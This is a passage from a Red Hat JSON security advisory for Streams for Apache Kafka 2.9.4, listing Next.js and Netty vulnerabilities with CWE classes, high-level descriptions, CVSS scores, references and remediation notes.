"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44575",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44575"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-267c-6grr-h53f"
}
],
"release_date": "2026-05-13T16:54:39.455000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Unauthorized access to protected content via middleware bypass"
},
{
"cve": "CVE-2026-44577",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-05-13T18:01:35.713847+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477194"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. When self-hosting Next.js with the default image loader, the Image Optimization API fetches local images entirely into memory without enforcing a maximum size limit. A remote attacker could exploit this by requesting large local assets from the /_next/image endpoint. This can lead to out-of-memory conditions, resulting in a Denial of Service (DoS) for the application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Denial of Service via Image Optimization API",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Next.js affects self-hosted applications utilizing the default image loader. A remote attacker can trigger a denial of service by requesting large local image assets, leading to out-of-memory conditions. This vulnerability is present when `images.localPatterns` is configured to allow all patterns by default, and is not applicable when using Vercel, a custom image loader, or `images.unoptimized: true`.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44577"
},
{
"category": "external",
"summary": "RHBZ#2477194",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477194"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44577",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44577"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44577",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44577"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-h64f-5h5j-jqjh"
}
],
"release_date": "2026-05-13T17:00:02.786000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Denial of Service via Image Optimization API"
},
{
"cve": "CVE-2026-44578",
"cwe": {
"id": "CWE-918",
"name": "Server-Side Request Forgery (SSRF)"
},
"discovery_date": "2026-05-13T18:01:13.729805+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477187"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Self-hosted applications utilizing the built-in Node.js server are vulnerable to Server-Side Request Forgery (SSRF) through specially crafted WebSocket upgrade requests. A remote attacker can exploit this by causing the server to proxy requests to arbitrary internal or external destinations. This could lead to the exposure of internal services or sensitive cloud metadata endpoints.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "Next.js: Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44578"
},
{
"category": "external",
"summary": "RHBZ#2477187",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477187"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44578",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44578"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44578",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44578"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-c4j6-fc7j-m34r"
}
],
"release_date": "2026-05-13T17:01:38.942000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.6,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "Next.js: Next.js: Server-Side Request Forgery via crafted WebSocket upgrade requests"
},
{
"cve": "CVE-2026-44579",
"cwe": {
"id": "CWE-833",
"name": "Deadlock"
},
"discovery_date": "2026-05-13T18:01:32.406247+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477193"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. Applications utilizing Partial Prerendering via the Cache Components feature are susceptible to connection exhaustion. A remote attacker can send crafted POST requests to a server action, triggering a request-body handling deadlock. This leaves connections open, consuming server resources and ultimately leading to a Denial of Service (DoS) for legitimate users.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Denial of Service via crafted POST requests to server actions",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44579"
},
{
"category": "external",
"summary": "RHBZ#2477193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44579",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44579"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44579",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44579"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-mg66-mrh9-m8jx"
}
],
"release_date": "2026-05-13T17:04:28.388000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Denial of Service via crafted POST requests to server actions"
},
{
"cve": "CVE-2026-44893",
"cwe": {
"id": "CWE-805",
"name": "Buffer Access with Incorrect Length Value"
},
"discovery_date": "2026-06-12T15:01:18.066312+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488383"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in netty-codec-haproxy, a component of the Netty network application framework. A remote attacker can exploit this vulnerability by sending a specially crafted HAProxy message with a malformed PP2_TYPE_SSL TLV (Type-Length-Value) header. This can lead to an IndexOutOfBoundsException and prevent the release of retained memory, ultimately causing a Denial of Service (DoS) condition for the affected application.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec-haproxy: Netty-codec-haproxy: Denial of Service via malformed HAProxy message",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This flaw is rated as Important because a remote, unauthenticated attacker can trigger a denial of service in applications utilizing `netty-codec-haproxy`. By sending a specially crafted HAProxy message with a malformed SSL TLV header, an attacker can cause an `IndexOutOfBoundsException`, leading to unreleased memory and resource exhaustion. This can render the affected application unresponsive.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-44893"
},
{
"category": "external",
"summary": "RHBZ#2488383",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488383"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-44893",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-44893"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-44893",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44893"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-cc37-9q2j-3hfv",
"url": "https://github.com/netty/netty/security/advisories/GHSA-cc37-9q2j-3hfv"
}
],
"release_date": "2026-06-12T14:00:25.801000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-codec-haproxy: Netty-codec-haproxy: Denial of Service via malformed HAProxy message"
},
{
"cve": "CVE-2026-45109",
"cwe": {
"id": "CWE-358",
"name": "Improperly Implemented Security Check for Standard"
},
"discovery_date": "2026-05-13T18:01:23.402405+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2477190"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Next.js. A remote unauthenticated attacker could exploit a bypass in a security fix when using middleware.ts with Turbopack. This vulnerability could lead to the disclosure of sensitive information.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "next.js: Next.js: Information disclosure via security fix bypass in middleware with Turbopack",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45109"
},
{
"category": "external",
"summary": "RHBZ#2477190",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2477190"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45109",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45109"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45109",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45109"
},
{
"category": "external",
"summary": "https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6",
"url": "https://github.com/vercel/next.js/security/advisories/GHSA-26hh-7cqf-hhc6"
}
],
"release_date": "2026-05-13T17:11:07.275000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "next.js: Next.js: Information disclosure via security fix bypass in middleware with Turbopack"
},
{
"cve": "CVE-2026-45416",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-06-12T15:01:45.671884+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488391"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty, a network application framework. A remote attacker can exploit this vulnerability by sending a crafted TLS (Transport Layer Security) ClientHello message. This can lead to an eager allocation of a large memory buffer, causing a Denial of Service (DoS) due to excessive memory consumption. The issue occurs in the `SslClientHelloHandler.decode()` method when processing the TLS handshake length.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-handler: Netty: Denial of Service due to eager buffer allocation in TLS handshake",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This vulnerability in Netty is rated as Important. It allows a remote attacker to trigger a denial of service by sending a specially crafted TLS ClientHello message. The flaw arises from an eager, unbounded memory allocation during the TLS handshake, particularly when default configurations disable the maximum client hello length guard, leading to excessive resource consumption in affected Red Hat products utilizing Netty.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45416"
},
{
"category": "external",
"summary": "RHBZ#2488391",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488391"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45416",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45416"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45416",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45416"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-x4gw-5cx5-pgmh",
"url": "https://github.com/netty/netty/security/advisories/GHSA-x4gw-5cx5-pgmh"
}
],
"release_date": "2026-06-12T14:10:05.585000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "To mitigate this issue, configure applications utilizing Netty\u0027s `SslClientHelloHandler` to specify a non-zero value for the `maxClientHelloLength` parameter. This will enable the internal length validation, preventing the eager allocation of large memory buffers when processing crafted TLS ClientHello messages. Refer to your specific application\u0027s documentation for details on configuring Netty\u0027s TLS handler. A restart of the affected application or service is required for the configuration changes to take effect.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-handler: Netty: Denial of Service due to eager buffer allocation in TLS handshake"
},
{
"cve": "CVE-2026-45674",
"cwe": {
"id": "CWE-346",
"name": "Origin Validation Error"
},
"discovery_date": "2026-06-12T15:02:15.565158+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488400"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s DnsResolveContext. This vulnerability allows a remote attacker to achieve information disclosure or data manipulation by crafting malicious DNS responses. The flaw occurs because the DnsResolveContext fails to validate the origin (bailiwick) of CNAME records in DNS responses, which could enable an attacker to redirect network traffic or intercept sensitive data from affected applications.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-resolver-dns: Netty: Information disclosure and data manipulation due to improper CNAME record validation",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important severity flaw in Netty\u0027s DnsResolveContext allows a remote attacker to achieve information disclosure or data manipulation. By crafting malicious DNS responses, an attacker could redirect network traffic or intercept sensitive data, impacting applications utilizing Netty for DNS resolution in Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-45674"
},
{
"category": "external",
"summary": "RHBZ#2488400",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488400"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-45674",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-45674"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-45674",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45674"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-676x-f7gg-47vc",
"url": "https://github.com/netty/netty/security/advisories/GHSA-676x-f7gg-47vc"
}
],
"release_date": "2026-06-12T14:17:50.203000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "netty-resolver-dns: Netty: Information disclosure and data manipulation due to improper CNAME record validation"
},
{
"cve": "CVE-2026-47691",
"cwe": {
"id": "CWE-346",
"name": "Origin Validation Error"
},
"discovery_date": "2026-06-12T16:02:45.855856+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488439"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Netty\u0027s `DnsResolveContext`. An attacker controlling an authoritative name server for a subdomain can exploit this vulnerability by providing crafted NS records that are insufficiently validated. This allows the attacker to poison the DNS cache for parent domains, bypassing standard bailiwick rules. Consequently, future DNS resolutions for the affected parent domain will use the poisoned cache, potentially redirecting users to malicious servers and leading to information disclosure or integrity compromise.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "io.netty/netty-resolver-dns: Netty has Insufficient Bailiwick Validation for NS Records",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "This Important flaw in Netty\u0027s DNS resolution component, `netty-resolver-dns`, allows for DNS cache poisoning. An attacker with control over an authoritative name server for a subdomain could exploit this vulnerability to inject malicious DNS records into the cache of parent domains. This could lead to redirection of network traffic, impacting the integrity and availability of services relying on DNS resolution within affected Red Hat products.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Streams for Apache Kafka 2.9.4"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-47691"
},
{
"category": "external",
"summary": "RHBZ#2488439",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2488439"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-47691",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-47691"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-47691",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47691"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.1.135.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final",
"url": "https://github.com/netty/netty/releases/tag/netty-4.2.15.Final"
},
{
"category": "external",
"summary": "https://github.com/netty/netty/security/advisories/GHSA-5pvg-856g-cp85",
"url": "https://github.com/netty/netty/security/advisories/GHSA-5pvg-856g-cp85"
}
],
"release_date": "2026-06-12T14:33:16.595000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-02T00:03:15+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:34608"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base, or stability.",
"product_ids": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Streams for Apache Kafka 2.9.4"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "io.netty/netty-resolver-dns: Netty has Insufficient Bailiwick Validation for NS Records"
},
{
"cve": "CVE-2026-48043",
"cwe": {
"id": "CWE-772",
"name": "Missing Release of Resource after Effective Lifetime"
},
"discovery_date": "2026-06-12T16:02:56.371830+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2488442"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in netty-codec-http2. A remote attacker could send specially crafted frames that cause a resource leak within the `DelegatingDecompressorFrameListener` class. This resource leak could lead to an Out Of Memory Error (OOME), potentially causing a Denial of Service (DoS) by taking down the entire Java Virtual Machine (JVM).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "netty-codec-http2: netty-codec-http2: Denial of Service due to resource leak",
"title": "Vulnerability summary"
},
{
"category": "other",
